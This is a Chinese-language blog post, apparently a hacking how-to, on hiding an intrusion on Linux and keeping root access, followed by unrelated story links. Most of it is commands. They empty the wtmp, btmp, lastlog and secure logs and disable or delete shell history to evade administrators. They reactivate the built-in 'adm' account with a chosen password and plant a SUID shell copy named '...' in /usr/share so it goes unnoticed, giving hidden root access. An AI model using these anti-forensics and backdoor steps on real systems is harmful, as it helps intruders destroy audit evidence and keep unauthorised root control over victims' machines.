linux清理入侵日志和維持權(quán)限

清除日志

1寞酿、清除登錄ssh登錄日志鲜棠、安全日志、last脸哀、lastb等

cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure

2嫁乘、history刪除

set +o history (最前面有空格)

輸入該命令后英遭,在當(dāng)前終端,之后輸入的所有命令都不會被history記錄(防止搞到一半被管理員斷網(wǎng)亦渗,記錄留下)

history -c

輸入該命令之后挖诸,當(dāng)前終端所有輸過的命令不會被記錄到history(一般這>個就夠了)

rm -rf ~/.bash_history

刪除history,意思之前管理員記錄的history也沒了法精,有的管理員有查看history的習(xí)慣多律,這條慎用

linux suid提權(quán)

前提:以root權(quán)限激活用戶痴突,并創(chuàng)建suid提權(quán)的后門
激活adm用戶(linux自帶很多無用用戶,如adm)
usermod -s /bin/bash adm
echo "password"|passwd --stdin adm
suid提權(quán)狼荞,把sh復(fù)制重命名為...辽装,放在其他文件夾,加s權(quán)限相味,重命名為...是為了不被發(fā)現(xiàn),ls看不到拾积,ls -la一般人也看不出
cp /bin/sh /usr/share/...
chmod a+s /usr/share/...
使用時以adm ssh登錄,然后輸入以下命令就是root權(quán)限了
./usr/share/... -p
經(jīng)測試3.10.0可以完全root權(quán)限丰涉,有些版本權(quán)限會有問題

linux sudo提權(quán)

前提:linux /etc/sudoers文件有添加你普通用戶的賬號


在以普通用戶test執(zhí)行sudo bash
輸入test用戶的密碼
同理sudo vim sudo sh也是可以的

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末拓巧,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子一死,更是在濱河造成了極大的恐慌肛度,老刑警劉巖,帶你破解...
    沈念sama閱讀 207,248評論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件投慈,死亡現(xiàn)場離奇詭異承耿,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)伪煤,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,681評論 2 381
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門加袋,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人抱既,你說我怎么就攤上這事职烧。” “怎么了蝙砌?”我有些...
    開封第一講書人閱讀 153,443評論 0 344
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長跋理。 經(jīng)常有香客問我择克,道長,這世上最難降的妖魔是什么前普? 我笑而不...
    開封第一講書人閱讀 55,475評論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任肚邢,我火速辦了婚禮,結(jié)果婚禮上拭卿,老公的妹妹穿的比我還像新娘骡湖。我一直安慰自己,他們只是感情好峻厚,可當(dāng)我...
    茶點故事閱讀 64,458評論 5 374
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布响蕴。 她就那樣靜靜地躺著,像睡著了一般惠桃。 火紅的嫁衣襯著肌膚如雪浦夷。 梳的紋絲不亂的頭發(fā)上辖试,一...
    開封第一講書人閱讀 49,185評論 1 284
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音劈狐,去河邊找鬼罐孝。 笑死,一個胖子當(dāng)著我的面吹牛肥缔,可吹牛的內(nèi)容都是我干的莲兢。 我是一名探鬼主播,決...
    沈念sama閱讀 38,451評論 3 401
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼续膳,長吁一口氣:“原來是場噩夢啊……” “哼改艇!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起姑宽,我...
    開封第一講書人閱讀 37,112評論 0 261
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤遣耍,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后炮车,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體舵变,經(jīng)...
    沈念sama閱讀 43,609評論 1 300
  • ?護(hù)林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,083評論 2 325
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年瘦穆,在試婚紗的時候發(fā)現(xiàn)自己被綠了纪隙。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,163評論 1 334
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡扛或,死狀恐怖绵咱,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情熙兔,我是刑警寧澤悲伶,帶...
    沈念sama閱讀 33,803評論 4 323
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布粪薛,位于F島的核電站常侣,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏冀偶。R本人自食惡果不足惜舆声,卻給世界環(huán)境...
    茶點故事閱讀 39,357評論 3 307
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一花沉、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧媳握,春花似錦碱屁、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,357評論 0 19
  • 一樁弒父案娩脾,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至打毛,卻和暖如春晦雨,著一層夾襖步出監(jiān)牢的瞬間架曹,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,590評論 1 261
  • 情欲美人皮
    我被黑心中介騙來泰國打工闹瞧, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留绑雄,地道東北人。 一個月前我還...
    沈念sama閱讀 45,636評論 2 355
  • 代替公主和親
    正文 我出身青樓奥邮,卻偏偏與公主長得像万牺,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子洽腺,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,925評論 2 344

推薦閱讀更多精彩內(nèi)容

  • mean to add the formatted="false" attribute?.[ 46% 47325/...
    ProZoom閱讀 2,693評論 0 3
  • 進(jìn)入帶空格的文件或者文件夾 Linux文件權(quán)限詳解 文件和目錄權(quán)限概述 在linux中的每一個文件或目錄都包含有訪...
    annkee閱讀 2,643評論 0 4
  • 本文筆記源自這里——[實驗樓]歡迎大家在下面交流其中有問題的地方喜歡請點收藏脚粟,每日更新(全部已親自實踐). 一. ...
    東皇Amrzs閱讀 3,963評論 7 54
  • 1.命令格式:ifconfig [網(wǎng)絡(luò)設(shè)備] [參數(shù)] 2.命令功能: ifconfig 命令用來查看和配置網(wǎng)絡(luò)設(shè)...
    Nuuuu閱讀 3,705評論 0 12
  • 黑米豬竟然跟小區(qū)里面小孩打羽毛球 以后要生個小孩讓黑米豬陪他打羽毛球 哼
    安之SY閱讀 130評論 0 0